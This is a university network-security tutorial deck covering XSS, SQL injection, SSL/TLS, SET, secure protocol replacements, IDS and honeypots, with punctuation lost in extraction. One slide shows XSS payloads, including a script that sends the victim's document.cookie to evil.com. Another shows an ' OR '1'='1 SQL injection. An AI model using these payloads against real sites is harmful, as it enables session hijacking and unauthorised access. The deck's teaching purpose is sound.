Network Security 32548 Tutorial 10

1
Network Security 32548Tutorial 1011

• Tutor Patrick Tran
• Email tiptran_at_it.uts.edu.au
• Office Location Room CB10.05.210
• Personal Link http//www-staff.it.uts.edu.au/tip
  tran/

2

• Browser security
• Authentication to server
• Client certificates (Bank - client)
• Authentication methods (password, tokens)
• Integrity
• Viruses, Cross site scripting
• Confidentiality
• Cookie stealing ? impersonate
• Example Exploit XSS to steal cookies
• A website allows user to post a message and to be
  displayed by other users.
• Hacker types Java Script into a text area
• ltscriptgt alert(document.cookie) lt/scriptgt ?
  Page Load ? remove ltscriptgt tags
• lta href"javascriptalert(document.cookie)"gtClick
  melt/agtlta hreft1.html" onClick"alert(document.
  cookie)"gttestlt/agt? Link is clicked ? do not
  click!
• lta hreft1.html" onMouseOver"alert(document.cook
  ie)"gtTestlt/agt ? Pointer moves over
• ltscriptgtdocument.location 'http//evil.com/blah.
  cgi?cookie' document.cookielt/scriptgt ?
  Redirection (evil website, malicious script,
  cookies recorded)

3

• Server Security
• Web server with HTML rendering capability
• SQL Injection
• SELECT UserList.UsernameFROM UserListWHERE
  UserList.Username 'UsernameAND
  UserList.Password 'Password
• SELECT UserList.UsernameFROM UserListWHERE
  UserList.Username 'UsernameAND
  UserList.Password 'password' OR '1''1
• Protect servers by using Application Gateway
  (Proxy server)
• Input validation
• Authentication, Authorization
• Disallow direct communication to servers protect
  servers behind it
• Load balancing (protect from DoS)

4

• SECURE SHOCKET LAYER (SSL)
• Developed by Netscape (credit card, VPN, )
• Confidentiality, Integrity, Authenticity.
• Use web browser only ? simple, easy to setup,
  cheap
• Public/private key PKI certificates
• Client machine is not authenticated by default ?
  need to be secured (Server authentication by
  default but Mutual authentication is possible)
• Timeouts and re-authentication (after periods
  of inactivity)
• Increased load (Encryption/Decryption and every
  request requires additional handshake)
• Adds encryptions and authentication to http, ftp
  (HTTPS is slower than HTTP )
• SSL ? TLS (Transport Layer Security)
• TLS Handshake
• Cipher and Hash negotiation
• Server Authentication
• Secrete key exchange
• Start secure communication

5
(No Transcript)
6

• 3. SSL has two layers of protocols, what is the
  lower layer called and what is its function? What
  are the three upper housekeeping protocols
  called and state their functions.
• SSL Record Protocol
• Base protocol that can be utilized by upper-layer
  protocols of SSL
• Encapsulate higher level protocols
• Provides 2 services for SSL connections
• Confidentiality encrypt application data
  (symmetric encryption)
• Integrity - HMAC (shared secrete key)
• Compression (optional)

7

• The SSL Change Cipher Spec Protocol
• Establish agreement on the Cipher Suite
• Move a pending session to an established one
  after the negotiations have been completed
• The SSL Alert Protocol
• SSL error messages between client and server
• Warning or fatal ?terminate connections
  immediately
• The SSL Handshake Protocol
• Establish SSL session (different from
  connection 1-m, set of parametersltgt actual
  connection link )
• Authentication of servers and clients,
• Negotiation of the cryptographic algorithms to be
  used,
• Data transfer

8

• SSL Handshake
• Certificate
• Server sends certificate to browser.
• Validation
• Browser verifies the digital signature
• Check SSL certificate (name, expiration date,
  certificate authority (CA).
• Encryption
• Browser creates random session key,
• Encrypt data using session key
• Encrypts it using the public key of server

9
SET Secure Electronic Transactions

• Protect internet credit card transactions
• Developed by VISA and Master Card
• Provides
• Privacy (encryption)
• Integrity (hash and digital signature)
• Authentication and non-repudiation (digital
  certificates and public key encryption)
• Difficulties
• Interoperability between SET applications of
  different software vendors.
• Integration with legacy systems
• SET transactions are slow and expensive to
  implement
• Not Portable (require both software and
  certificates to be installed on cardholders local
  machine)
• Not very safe in the card holder side
  (certificates are stored in the local machine!)

10
(No Transcript)
11

• 6. SET is designed solely to support the use of
  credit card transactions
• (a) Compare the security of using SET with using
  https for a credit card transaction.
• Similar to SSL
• Authentication and Integrity (public key
  certificates)
• Different from SSL
• SSL exposes client to merchant
• SET restricts merchant to access order info
  (payment info is encrypted for financial
  institutions)

12

• (b) SET requires customer and merchant to have a
  digital certificate, signed by a CA. Has this
  requirement been relaxed now? Should it be
  relaxed
• SSL/TLS protect credit card details from
  eavesdropping ? how about dishonest client /
  merchant?
• SET requires certificate registration
• Order over phone with credit card number (maybe
  ok now!)
• Order over Internet with credit card number,
  still need
• Certificate ? digital signature
• Upon registration ? secrete number

13

• 7. In SET, what is the purpose of the customers
  browser sending Order Information (OI) in clear
  text, and the Payment Information (PI) encrypted
  with the payment gateways public key?
• 8. In SET, although OI is unencrypted, how does
  the merchant know the order details have not been
  tampered with by Trudy?
• OI is in clear ? no need to keep secrete
• OI is larger than PI, no encryption ? less
  processing
• PI is only available for banks ? encrypted with
  banks public key
• OI is integrity checked by a hash function

14

• 11. For the following unsecure applications, list
  which secure protocol you would use as a
  replacement HTTP, FTP, SMTP, TELNET, DNS
• 9. What is S-HTTP and how does it differ from
  SSL?
• HTTP ? S-HTTP or HTTPS
• S-HTTP more advanced version of HTTP
  (application layer), individual message basis
• HTTPS normal HTTP over SSL (transport layer),
  secure connection between 2
• FTP ? FTPS
• SMTP ? S/MIME or PGP
• TELNET ? SSH
• DNS ? DNSSEC
• Security Extension authentication / integrity /
  non repudiation
• Does not provide confidentiality
• Protect DNS from cache poisoning
• ISP DNS server caches previous request
• Compromise DNS server ? poison IP address entries
  ? fake sites
• Does not protect against DDoS Attacks.

15
INTRUSION DETECTION SYSTEM (IDS)

• 1. State what the terms IDS and IPS stand for,
  and briefly explain the difference between them.
• 5. Discuss the differences between a firewall and
  an IDS, especially if a decision is taken to
  prosecute a cracker.

• IDS versus Firewall
• Simplicity
• Passive / Proactive
• Inline / out-of-band
• Timeliness

16

• 3. Discuss the timeliness of IDS, ranging from
  examining log files to real time IPS.
• On the fly
• Faster response time
• Large RAM to record events in recent time
• Smaller time window ? limited view of global
  attacks
• Post Mortem
• Data storage for history records (also
  susceptible to intrusion)
• 4. Briefly explain and justify possible placement
  options for IDS.
• Network based IDS
• Deploying special sensors at strategic locations
  (gateways, routers)
• Inspecting network traffic
• Look for violations of protocols and unusual
  connection patterns.
• Look for malicious command sequences (data
  portion of packet)
• Host based IDS
• Examine system usage activities (logs, file
  integrity check)
• Using OS auditing mechanisms

17

• Host based IDS
• Can monitor user-specific activities (access
  privileges) ? NIDS cannot
• Provide second line of defence (after network
  based IDS)
• Network based IDS
• Can detect DoS and port scan
• Can detect server specific attacks (targets in
  DMZ such as web servers, mail servers )

• Behind a firewall
• Provide Second line of defence
• Verify the effectiveness of the firewall
• Not fully utilized
• Outside a firewall
• Gain more knowledge about network attacks

18

• 9. Briefly explain the difference between misuse
  and anomaly detection, and discuss how they would
  be used.
• Misuse detection detect activities similar to
  known attack signatures
• Concern how to collect known attacks
• Cant detect new/novel attacks (even trivial
  variants)
• Low false alarm rate (bypass if dont know)
• Must maintain signature database updated
• Anomaly detection detect statistically
  significant deviation from established profile of
  normal activities
• Concern how to collect normal users (quite
  complicated)
• High false alarm rate
• Can detect novel attacks

19

• 11. State the difference between a honey net and
  a honey pot
• Honey pot
• Deception (like production) ? Detection
• Has no authorized activities
• Any interaction with honey pot is from attackers
  ? Low false alarm
• Capture small data with very high value ? No need
  to filter legitimate
• Compromising honeypot does not affect other
  non-honeypot machines
• Collect data to learn what technologies /
  vulnerabilities that an attacker uses / exploits.
  
• How it helps
• Confuse and make hackers to waste their time and
  resources
• Learn emerging hacking technologies and identify
  the hackers ? prevent / prosecute / improve
  security

20

• Honey net
• Many honeypots connected in a real network using
  a firewall and an IDS
• Target more attackers
• Collect more realistic data
• Data Control control data flow protect non honey
  pots
• Without hackers notice
• Still give hacker enough flexibility
• Data Capture
• Without hackers notice
• Integrity
• Data Collection gather data from multiple
  honeynets.

21
Questions?